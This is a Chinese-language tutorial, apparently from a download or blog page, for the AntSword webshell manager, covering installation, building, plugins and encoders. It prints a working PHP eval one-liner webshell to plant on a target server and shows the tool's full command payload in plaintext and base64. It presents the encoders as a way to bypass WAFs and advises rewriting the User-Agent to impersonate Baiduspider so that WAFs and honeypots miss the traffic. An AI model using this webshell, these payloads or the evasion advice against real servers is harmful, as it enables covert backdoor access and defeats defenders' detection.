中国蚁剑AntSword
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。
核心功能
- Shell代理功能
- Shell管理
- 文件管理
- 虚拟终端
- 数据库管理
- 插件市场
- 插件开发
开发版本针对有一定编程基础的开发者,你可以根据阅读文档或者分析源码了解熟悉整个应用的执行流程,然后便可随意对代码进行修改增强个性化自定义,真正打造出属于自己的一把宝剑!
中国蚁剑AntSword下载安装
蚁剑AntSword加载器安装
从 v2.0.0-beta 版本开始,引入了加载器概念。用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编辑/执行/调试等操作。可直接运行当前最新的开发版和发行版源代码。点此获取加载器
系统 | 下载 | 说明 |
---|---|---|
OSX/MAC | dmg | 中国蚁剑AntSword MAC安装 |
Linux 64位 | linux-x64.zip | 中国蚁剑AntSword Linux安装 |
Windows 64位 | windows-x64.zip | 中国蚁剑AntSword Windows安装 |
中国蚁剑AntSword源代码下载~直接Releases下载即可
注意:蚁剑加载器仅在 https://github.com/AntSwordProject/AntSword-Loader
发布,下载后请第一时间校验 md5 值。
首次打开加载器时,界面如下图所示:
点击「初始化
」按钮,选择一个空目录作为蚁剑的工作目录,加载器会自动下载源代码。待提示初始化完毕时,重新打开蚁剑加载器,即可看到蚁剑的主界面。
蚁剑AntSword下载源码编译安装
下载蚁剑AntSword源码并安装依赖
$ git clone https://github.com/antoor/antSword.git $ npm install
编译源码
$ npm run build
启动应用
$ npm start
中国蚁剑AntSword简单使用
以PHP为例蚁剑教程,在目标服务器的Web目录下新建一个Shell,名为ant.php,内容
<?php eval($_POST['ant']); ?>
打开AntSword,在空白位置单击「鼠标右键」,弹出菜单中选择 「添加数据
」,在添加数据界面中,添加连接信息。然后点击 「添加
」按钮,即可在数据管理中看到刚才添加的 Shell,双击刚才添加的 Shell,即可看到文件管理界面,右键会更到更多功能。使用大致和菜刀类似。使用中你会发现更多中国蚁剑AntSword的使用技巧。
中国蚁剑具体使用方法
使用其实跟菜刀几乎差不多,只是蚁剑功能更强大一些,下面就简单给大家说说:
1、添加一个shell
首先:右键单击 – 添加数据;
输入URL地址,连接密码以及编码设置。PHP语言推荐编辑器使用chr加密;
如果需要自己写编码器的加密类型,可以按下图来操作:
还可以配置shell的请求信息和post内容;
最后:还可以配置全局代理;
2、插件
中国蚁剑有一个插件市场,可以安装一些插件,插件有很多。以下是部份插件截图:
插件有很多,下载后都是到本地到
插件也都是开源的
这里有一个比较有特色的,超级终端
下面是演示的视频demo
https://v.youku.com/v_show/id_XMzc0MzgzOTU1Mg==.html
3、关于编码器
编码器是这个程序的过人之处,用编码器加密可以轻松绕过WAF。
不妨,我们来对比一下默认不使用编码传输和base64编码传输的区别:
明文传输,post内容为:
ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "8e51f";die();
base64加密传输,post内容为:
_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));
注意:其中,ant参数名称是shell密码。
再来看看chr编码传输,完全就全部编码了。
4、user-agent修改
要注意的是,软件默认的user-agent是:User-Agent: antSword/v2.0;而且大部分人都不会去自定义useragent,这就给waf和蜜罐白白送了一个特征,所以我们要修改一下源代码:
修改项目路径:
antSword\modules\request.js (修改const USER_AGENT = 'antSword/v2.1'; 这一行代码!)
antSword\modules\update.js (有两处要修改;可搜索“antSword/v2.0”来找到这两行代码!)
我这里是把antSword/v2.0或antSword/v2.1修改为了Baiduspider-image,我改成了百度图片蜘蛛;
如果大家还有什么不懂的,请查看中文说明书:https://doc.u0u.us/zh-hans/